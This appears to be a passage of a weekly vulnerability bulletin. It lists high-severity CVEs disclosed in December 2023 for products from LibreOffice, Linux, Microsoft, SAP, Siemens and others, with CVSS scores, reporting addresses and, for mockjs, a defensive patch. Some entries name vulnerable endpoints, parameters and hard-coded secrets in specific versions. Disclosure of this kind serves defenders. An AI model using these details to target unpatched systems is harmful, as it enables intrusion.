libreoffice — libreoffice Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins. In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system. 2023-12-11 8.8 CVE-2023-6185
security@documentfoundation.org
security@documentfoundation.org
security@documentfoundation.org
libreoffice — libreoffice Insufficient macro permission validation of The Document Foundation LibreOffice allows an attacker to execute built-in macros without warning. In affected versions LibreOffice supports hyperlinks with macro or similar built-in command targets that can be executed when activated without warning the user. 2023-12-11 8.8 CVE-2023-6186
security@documentfoundation.org
security@documentfoundation.org
security@documentfoundation.org
linecorp — line An issue in studio kent mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. 2023-12-08 8.2 CVE-2023-43305
cve@mitre.org
linux — kernel An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information. 2023-12-08 7.1 CVE-2023-6606
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information. 2023-12-08 7.1 CVE-2023-6610
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
mattermost — mattermost Mattermost fails to validate if a relative path is passed in /plugins/playbooks/api/v0/telemetry/run/ as a telemetry run ID, allowing an attacker to use a path traversal payload that points to a different endpoint leading to a CSRF attack. 2023-12-12 8.8 CVE-2023-45316
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to to check the length when setting the title in a run checklist in Playbooks, allowing an attacker to send a specially crafted request and crash the Playbooks plugin 2023-12-12 7.5 CVE-2023-45847
responsibledisclosure@mattermost.com
mattermost — mattermost Mattermost fails to validate the type of the “reminder” body request parameter allowing an attacker to crash the Playbook Plugin when updating the status dialog. 2023-12-12 7.5 CVE-2023-49607
responsibledisclosure@mattermost.com
mgt-commerce — cloudpanel File-Manager in MGT CloudPanel 2.0.0 through 2.3.2 allows the lowest privilege user to achieve OS command injection by changing file ownership and changing file permissions to 4755. 2023-12-08 8.8 CVE-2023-46157
cve@mitre.org
cve@mitre.org
microsoft — azure_connected_machine_agent Azure Connected Machine Agent Elevation of Privilege Vulnerability 2023-12-12 7.3 CVE-2023-35624
secure@microsoft.com
microsoft — dynamics_365 Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-35621
secure@microsoft.com
microsoft — microsoft_malware_protection_platform Microsoft Defender Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-36010
secure@microsoft.com
microsoft — microsoft_power_platform Microsoft Power Platform Connector Spoofing Vulnerability 2023-12-12 9.6 CVE-2023-36019
secure@microsoft.com
microsoft — windows Windows DPAPI (Data Protection Application Programming Interface) Spoofing Vulnerability 2023-12-12 7.5 CVE-2023-36004
secure@microsoft.com
microsoft — windows Windows Telephony Server Elevation of Privilege Vulnerability 2023-12-12 7.5 CVE-2023-36005
secure@microsoft.com
microsoft — windows_10 Windows MSHTML Platform Remote Code Execution Vulnerability 2023-12-12 8.1 CVE-2023-35628
secure@microsoft.com
microsoft — windows_10 Internet Connection Sharing (ICS) Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35630
secure@microsoft.com
microsoft — windows_10 Microsoft ODBC Driver Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35639
secure@microsoft.com
microsoft — windows_10 Internet Connection Sharing (ICS) Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35641
secure@microsoft.com
microsoft — windows_10 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-36006
secure@microsoft.com
microsoft — windows_10 Win32k Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36011
secure@microsoft.com
microsoft — windows_10_1507 Windows Media Remote Code Execution Vulnerability 2023-12-12 7.8 CVE-2023-21740
secure@microsoft.com
microsoft — windows_10_1507 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35632
secure@microsoft.com
microsoft — windows_10_1507 Windows Kernel Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35633
secure@microsoft.com
microsoft — windows_10_1809 Windows Sysmain Service Elevation of Privilege 2023-12-12 7.8 CVE-2023-35644
secure@microsoft.com
microsoft — windows_10_1809 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36696
secure@microsoft.com
microsoft — windows_11 Windows Bluetooth Driver Remote Code Execution Vulnerability 2023-12-12 8.8 CVE-2023-35634
secure@microsoft.com
microsoft — windows_11_21h2 Win32k Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-35631
secure@microsoft.com
microsoft — windows_11_23h2 Local Security Authority Subsystem Service Elevation of Privilege Vulnerability 2023-12-12 7.8 CVE-2023-36391
secure@microsoft.com
microsoft — windows_server_2008 Windows DNS Spoofing Vulnerability 2023-12-12 7.5 CVE-2023-35622
secure@microsoft.com
microsoft — windows_server_2012 DHCP Server Service Denial of Service Vulnerability 2023-12-12 7.5 CVE-2023-35638
secure@microsoft.com
microsoft — windows_server_2012 DHCP Server Service Information Disclosure Vulnerability 2023-12-12 7.5 CVE-2023-35643
secure@microsoft.com
microweber — microweber An issue in microweber v.2.0.1 and fixed in v.2.0.4 allows a remote attacker to obtain sensitive information via the HTTP GET method. 2023-12-08 7.5 CVE-2023-48122
cve@mitre.org
cve@mitre.org
milboj — flash_tool The flash_tool gem through 0.6.0 for Ruby allows command execution via shell metacharacters in the name of a downloaded file. 2023-12-12 9.8 CVE-2013-2513
cve@mitre.org
cve@mitre.org
mlflow — mlflow Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-12 8.8 CVE-2023-6709
security@huntr.dev
security@huntr.dev
mlflow — mlflow Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-13 8.8 CVE-2023-6753
security@huntr.dev
security@huntr.dev
mockjs — mock.js All versions of the package mockjs are vulnerable to Prototype Pollution via the Util.extend function due to missing check if the attribute resolves to the object prototype. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). User controlled inputs inside the extend() method of the Mock.Handler, Mock.Random, Mock.RE.Handler or Mock.Util, will allow an attacker to exploit this vulnerability. Workaround By using a denylist of dangerous attributes, this weakness can be eliminated. Add the following line in the Util.extend function: js js if ([“__proto__”, “constructor”, “prototype”].includes(name)) continue js // src/mock/handler.js Util.extend = function extend() { var target = arguments[0] || {}, i = 1, length = arguments.length, options, name, src, copy, clone if (length === 1) { target = this i = 0 } for (; i < length; i++) { options = arguments[i] if (!options) continue for (name in options) { if ([“__proto__”, “constructor”, “prototype”].includes(name)) continue src = target[name] copy = options[name] if (target === copy) continue if (copy === undefined) continue if (Util.isArray(copy) || Util.isObject(copy)) { if (Util.isArray(copy)) clone = src && Util.isArray(src) ? src : [] if (Util.isObject(copy)) clone = src && Util.isObject(src) ? src : {} target[name] = Util.extend(clone, copy) } else { target[name] = copy } } } return target } 2023-12-08 8.2 CVE-2023-26158
report@snyk.io
report@snyk.io
moonlight-stream — moonlight-common-c Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 02b7742f4d19631024bd766bd2bb76715780004e. 2023-12-14 8.8 CVE-2023-42799
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
moonlight-stream — moonlight-common-c Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit 50c0a51b10ecc5b3415ea78c21d96d679e2288f9 due to unmitigated usage of unsafe C functions and improper bounds checking. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client, or achieve remote code execution (RCE) on the client (with insufficient exploit mitigations or if mitigations can be bypassed). The bug was addressed in commit 24750d4b748fefa03d09fcfd6d45056faca354e0. 2023-12-14 8.8 CVE-2023-42800
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
moonlight-stream — moonlight-common-c
 		 Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit f57bd745b4cbed577ea654fad4701bea4d38b44c. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client. Achieving RCE is possible but unlikely, due to stack canaries in use by modern compiler toolchains. The published binaries for official clients Qt, Android, iOS/tvOS, and Embedded are built with stack canaries, but some unofficial clients may not use stack canaries. This vulnerability takes place after the pairing process, so it requires the client to be tricked into pairing to a malicious host. It is not possible to perform using a man-in-the-middle due to public key pinning that takes place during the pairing process. The bug was addressed in commit b2497a3918a6d79808d9fd0c04734786e70d5954. 2023-12-14 7.6 CVE-2023-42801
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
morpheus65535 — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, Bazarr contains an arbitrary file read in /system/backup/download/ endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50264
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
morpheus65535 — bazarr Bazarr manages and downloads subtitles. Prior to 1.3.1, the /api/swaggerui/static endpoint in bazarr/app/ui.py does not validate the user-controlled filename variable and uses it in the send_file function, which leads to an arbitrary file read on the system. This issue is fixed in version 1.3.1. 2023-12-15 7.5 CVE-2023-50265
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
mullvad — mullvad_vpn An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM. 2023-12-10 7.8 CVE-2023-50446
cve@mitre.org
cve@mitre.org
cve@mitre.org
multisuns — easylog_web+ Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. An remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48388
twcert@cert.org.tw
multisuns — easylog_web+ Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48390
twcert@cert.org.tw
multisuns — easylog_web+ Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48389
twcert@cert.org.tw
nadatel — at-0402r_firmware Improper Authentication vulnerability in Nadatel DVR allows Information Elicitation.This issue affects DVR: from 3.0.0 before 9.9.0. 2023-12-13 7.5 CVE-2023-45801
vuln@krcert.or.kr
ncp-e — secure_enterprise_client Support Assistant in NCP Secure Enterprise Client before 12.22 allows attackers to delete arbitrary files on the operating system by creating a symbolic link. 2023-12-09 8.1 CVE-2023-28868
cve@mitre.org
netgear — rbr750_firmware In Netgear Orbi RBR750 firmware before V7.2.6.21, there is a stack-based buffer overflow in /usr/sbin/httpd. 2023-12-08 9.8 CVE-2023-49007
cve@mitre.org
openjournalsystems — open_journal_systems A vulnerability has been discovered on OJS, that consists in a CSRF (Cross-Site Request Forgery) attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. 2023-12-11 8.8 CVE-2023-6671
cve-coordination@incibe.es
openzeppelin — contracts OpenZeppelin Contracts is a library for smart contract development. A merge issue when porting the 5.0.1 patch to the 4.9 branch caused a line duplication. In the version of `Multicall.sol` released in `@openzeppelin/contracts@4.9.4` and `@openzeppelin/contracts-upgradeable@4.9.4`, all subcalls are executed twice. Concretely, this exposes a user to unintentionally duplicate operations like asset transfers. The duplicated delegatecall was removed in version 4.9.5. The 4.9.4 version is marked as deprecated. Users are advised to upgrade. There are no known workarounds for this issue. 2023-12-09 7.5 CVE-2023-49798
security-advisories@github.com
security-advisories@github.com
palo_alto_networks — pan-os A DOM-Based cross-site scripting (XSS) vulnerability in Palo Alto Networks PAN-OS software enables a remote attacker to execute a JavaScript payload in the context of an administrator’s browser when they view a specifically crafted link to the PAN-OS web interface. 2023-12-13 8.8 CVE-2023-6790
psirt@paloaltonetworks.com
phoenix_contact — automation_worx_software_suite Incorrect Permission Assignment for Critical Resource vulnerability in multiple products of the PHOENIX CONTACT classic line allow an remote unauthenticated attacker to gain full access of the affected device. 2023-12-14 9.8 CVE-2023-46141
info@cert.vde.com
phoenix_contact — automation_worx_software_suite Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT classic line PLCs allows an unauthenticated remote attacker to modify some or all applications on a PLC. 2023-12-14 7.5 CVE-2023-46143
info@cert.vde.com
phoenix_contact — axc_f_1152 A incorrect permission assignment for critical resource vulnerability in PLCnext products allows an remote attacker with low privileges to gain full access on the affected devices. 2023-12-14 8.8 CVE-2023-46142
info@cert.vde.com
phoenix_contact — axc_f_1152 A download of code without integrity check vulnerability in PLCnext products allows an remote attacker with low privileges to compromise integrity on the affected engineering station and the connected devices. 2023-12-14 7.7 CVE-2023-46144
info@cert.vde.com
phoenix_contact — multiprog Incorrect Permission Assignment for Critical Resource vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to upload arbitrary malicious code and gain full access on the affected device. 2023-12-14 9.8 CVE-2023-0757
info@cert.vde.com
phoenix_contact — multiprog Download of Code Without Integrity Check vulnerability in PHOENIX CONTACT MULTIPROG, PHOENIX CONTACT ProConOS eCLR (SDK) allows an unauthenticated remote attacker to download and execute applications without integrity checks on the device which may result in a complete loss of integrity. 2023-12-14 7.5 CVE-2023-5592
info@cert.vde.com
photon_os — photon_os The vmwgfx driver contains a local privilege escalation vulnerability that allows unprivileged users to gain access to files opened by other processes on the system through a dangling ‘file’ pointer. 2023-12-13 7.8 CVE-2022-22942
security@vmware.com
security@vmware.com
security@vmware.com
phpems — phpems A vulnerability classified as critical was found in PHPEMS 6.x/7.0. Affected by this vulnerability is an unknown functionality in the library lib/session.cls.php of the component Session Data Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247357 was assigned to this vulnerability. 2023-12-10 8.8 CVE-2023-6654
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — nipah_virus_testing_management_system A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file password-recovery.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247341 was assigned to this vulnerability. 2023-12-10 9.8 CVE-2023-6648
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
postgresql — postgresql A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server’s memory. 2023-12-10 8.8 CVE-2023-5869
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified.  It is possible for an attacker to craft a XSS payload and store that value within a dashboard component.   If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser. 2023-12-14 7.6 CVE-2023-6364
security@progress.com
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within a device group.   If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser. 2023-12-14 7.6 CVE-2023-6365
security@progress.com
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within Alert Center.   If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser. 2023-12-14 7.6 CVE-2023-6366
security@progress.com
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, a stored cross-site scripting (XSS) vulnerability has been identified. It is possible for an attacker to craft a XSS payload and store that value within Roles.   If a WhatsUp Gold user interacts with the crafted payload, the attacker would be able to execute malicious JavaScript within the context of the victims browser. 2023-12-14 7.6 CVE-2023-6367
security@progress.com
security@progress.com
progress_software_corporation — whatsup_gold In WhatsUp Gold versions released before 2023.1, an API endpoint was found to be missing an authentication mechanism. It is possible for an unauthenticated attacker to enumerate ancillary credential information stored within WhatsUp Gold. 2023-12-14 7.5 CVE-2023-6595
security@progress.com
security@progress.com
prolion — cryptospike Insertion of sensitive information in the centralized (Grafana) logging system in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate other users in web management and the REST API by reading JWT tokens from logs (as a Granafa authenticated user) or from the Loki REST API without authentication. 2023-12-12 9.1 CVE-2023-36649
cve@mitre.org
prolion — cryptospike Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation. 2023-12-12 8.8 CVE-2023-36646
cve@mitre.org
prolion — cryptospike Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer). 2023-12-12 8.2 CVE-2023-36648
cve@mitre.org
prolion — cryptospike A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens. 2023-12-12 7.5 CVE-2023-36647
cve@mitre.org
prolion — cryptospike A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages. 2023-12-12 7.2 CVE-2023-36650
cve@mitre.org
prolion — cryptospike Hidden and hard-coded credentials in ProLion CryptoSpike 3.0.15P2 allow remote attackers to login to web management as super-admin and consume the most privileged REST API endpoints via these credentials. 2023-12-12 7.2 CVE-2023-36651
cve@mitre.org
pyinstaller — pyinstaller PyInstaller bundles a Python application and all its dependencies into a single package. A PyInstaller built application, elevated as a privileged process, may be tricked by an unprivileged attacker into deleting files the unprivileged user does not otherwise have access to. A user is affected if **all** the following are satisfied: 1. The user runs an application containing either `matplotlib` or `win32com`. 2. The application is ran as administrator (or at least a user with higher privileges than the attacker). 3. The user’s temporary directory is not locked to that specific user (most likely due to `TMP`/`TEMP` environment variables pointing to an unprotected, arbitrary, non default location). Either: A. The attacker is able to very carefully time the replacement of a temporary file with a symlink. This switch must occur exactly between `shutil.rmtree()`’s builtin symlink check and the deletion itself B: The application was built with Python 3.7.x or earlier which has no protection against Directory Junctions links. The vulnerability has been addressed in PR #7827 which corresponds to `pyinstaller >= 5.13.1`. Users are advised to upgrade. There are no known workarounds for this vulnerability. 2023-12-09 7.8 CVE-2023-49797
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
qnap — qts A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later 2023-12-08 7.2 CVE-2023-32968
security@qnapsecurity.com.tw
qnap — qts A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.0.1.2514 build 20230906 and later QTS 5.1.2.2533 build 20230926 and later QuTS hero h5.0.1.2515 build 20230907 and later QuTS hero h5.1.2.2534 build 20230927 and later 2023-12-08 7.2 CVE-2023-32975
security@qnapsecurity.com.tw
qnap — qvr_firmware An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QVR Firmware 5.0.0 and later 2023-12-08 8.8 CVE-2023-47565
security@qnapsecurity.com.tw
quarkus — quarkus A flaw was found in Quarkus. This issue occurs when receiving a request over websocket with no role-based permission specified on the GraphQL operation, Quarkus processes the request without authentication despite the endpoint being secured. This can allow an attacker to access information and functionality outside of normal granted API permissions. 2023-12-09 9.1 CVE-2023-6394
secalert@redhat.com
secalert@redhat.com
raghu_goriya — mytube_playlist Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Raghu Goriya MyTube PlayList allows Reflected XSS.This issue affects MyTube PlayList: from n/a through 2.0.3. 2023-12-14 7.1 CVE-2023-48767
audit@patchstack.com
relyum — rely-pcie_firmware An issue discovered in Relyum RELY-PCIe 22.2.1 devices. The authorization mechanism is not enforced in the web interface, allowing a low-privileged user to execute administrative functions. 2023-12-13 8.8 CVE-2023-47573
cve@mitre.org
repox — repox An authentication bypass vulnerability has been found in Repox, which allows a remote user to send a specially crafted POST request, due to the lack of any authentication method, resulting in the alteration or creation of users. 2023-12-13 9.4 CVE-2023-6718
cve-coordination@incibe.es
repox — repox An unrestricted file upload vulnerability has been identified in Repbox, which allows an attacker to upload malicious files via the transforamationfileupload function, due to the lack of proper file type validation controls, resulting in a full system compromise. 2023-12-13 9.8 CVE-2023-6723
cve-coordination@incibe.es
repox — repox An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application’s XML data processing in the fileupload function, resulting in interaction between the attacker and the server’s file system. 2023-12-13 8.3 CVE-2023-6721
cve-coordination@incibe.es
repox — repox A path traversal vulnerability has been detected in Repox, which allows an attacker to read arbitrary files on the running server, resulting in a disclosure of sensitive information. An attacker could access files such as application code or data, backend credentials, operating system files… 2023-12-13 7.5 CVE-2023-6722
cve-coordination@incibe.es
sap — @sap/xssec SAP BTP Security Services Integration Library ([Node.js] @sap/xssec – versions < 3.6.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-49583
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
sap — business_objects_business_intelligence_platform SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS allowing an attacker to upload agnostic documents in the system which when opened by any other user could lead to high impact on integrity of the application. 2023-12-12 7.6 CVE-2023-42478
cna@sap.com
cna@sap.com
sap — cloud-security-client-go SAP BTP Security Services Integration Library ([Golang] github.com/sap/cloud-security-client-go) – versions < 0.17.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50424
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
sap — cloud-security-services-integration-library SAP BTP Security Services Integration Library ([Java] cloud-security-services-integration-library) – versions below 2.17.0 and versions from 3.0.0 to before 3.3.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50422
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
sap — commerce_cloud In SAP Commerce Cloud – versions HY_COM 1905, HY_COM 2005, HY_COM2105, HY_COM 2011, HY_COM 2205, COM_CLOUD 2211, a locked B2B user can misuse the forgotten password functionality to un-block his user account again and re-gain access if SAP Commerce Cloud – Composable Storefront is used as storefront, due to weak access controls in place. This leads to a considerable impact on confidentiality and integrity. 2023-12-12 8.1 CVE-2023-42481
cna@sap.com
cna@sap.com
sap — sap-xssec SAP BTP Security Services Integration Library ([Python] sap-xssec) – versions < 4.1.0, allow under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application. 2023-12-12 9.8 CVE-2023-50423
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
cna@sap.com
sap_se — multiple_products SAP GUI for Windows and SAP GUI for Java – versions SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758, allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to create Layout configurations of the ABAP List Viewer and with this causing a mild impact on integrity and availability, e.g. also increasing the response times of the AS ABAP. 2023-12-12 7.3 CVE-2023-49580
cna@sap.com
cna@sap.com
sap_se — sap_emarsys_sdk_android Due to lack of proper authorization checks in Emarsys SDK for Android, an attacker can call a particular activity and can forward himself web pages and/or deep links without any validation directly from the host application. On successful attack, an attacker could navigate to arbitrary URL including application deep links on the device. 2023-12-12 7.1 CVE-2023-6542
cna@sap.com
cna@sap.com
schneider_electric — trio_q-series_ethernet_data_radio A CWE-601:URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability exists that could cause disclosure of information through phishing attempts over HTTP. 2023-12-14 8.2 CVE-2023-5629
cybersecurity@se.com
searchor — searchor main.py in Searchor before 2.4.2 uses eval on CLI input, which may cause unexpected code execution. 2023-12-12 9.8 CVE-2023-43364
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
sensormatic_electronics — iosmart An attacker with physical access to the Kantech Gen1 ioSmart card reader with firmware version prior to 1.07.02 in certain circumstances can recover the reader’s communication memory between the card and reader. 2023-12-14 7.5 CVE-2023-0248
productsecurity@jci.com
productsecurity@jci.com
seraphinite_solutions — seraphinite_accelerator Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Seraphinite Solutions Seraphinite Accelerator allows Reflected XSS.This issue affects Seraphinite Accelerator: from n/a through 2.20.28. 2023-12-14 7.1 CVE-2023-49740
audit@patchstack.com
siemens — logo! A vulnerability has been identified in LOGO! 12/24RCE (All versions >= V8.3), LOGO! 12/24RCEo (All versions >= V8.3), LOGO! 230RCE (All versions >= V8.3), LOGO! 230RCEo (All versions >= V8.3), LOGO! 24CE (All versions >= V8.3), LOGO! 24CEo (All versions >= V8.3), LOGO! 24RCE (All versions >= V8.3), LOGO! 24RCEo (All versions >= V8.3), SIPLUS LOGO! 12/24RCE (All versions >= V8.3), SIPLUS LOGO! 12/24RCEo (All versions >= V8.3), SIPLUS LOGO! 230RCE (All versions >= V8.3), SIPLUS LOGO! 230RCEo (All versions >= V8.3), SIPLUS LOGO! 24CE (All versions >= V8.3), SIPLUS LOGO! 24CEo (All versions >= V8.3), SIPLUS LOGO! 24RCE (All versions >= V8.3), SIPLUS LOGO! 24RCEo (All versions >= V8.3). Affected devices are vulnerable to an electromagnetic fault injection. This could allow an attacker to dump and debug the firmware, including the manipulation of memory. Further actions could allow to inject public keys of custom created key pairs which are then signed by the product CA. The generation of a custom certificate allows communication with, and impersonation of, any device of the same version. 2023-12-12 7.6 CVE-2022-42784
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle HTTP(S) requests to the web server correctly. This could allow an attacker to exhaust system resources and create a denial of service condition for the device. 2023-12-12 7.5 CVE-2022-47374
productcert@siemens.com
siemens — multiple_products A vulnerability has been identified in SIMATIC PC-Station Plus (All versions), SIMATIC S7-400 CPU 412-2 PN V7 (All versions), SIMATIC S7-400 CPU 414-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416-3 PN/DP V7 (All versions), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (All versions), SINAMICS S120 (incl. SIPLUS variants) (All versions < V5.2 SP3 HF15), SIPLUS S7-400 CPU 414-3 PN/DP V7 (All versions), SIPLUS S7-400 CPU 416-3 PN/DP V7 (All versions). The affected products do not handle long file names correctly. This could allow an attacker to create a buffer overflow and create a denial of service condition for the device. 2023-12-12 7.5 CVE-2022-47375
productcert@siemens.com
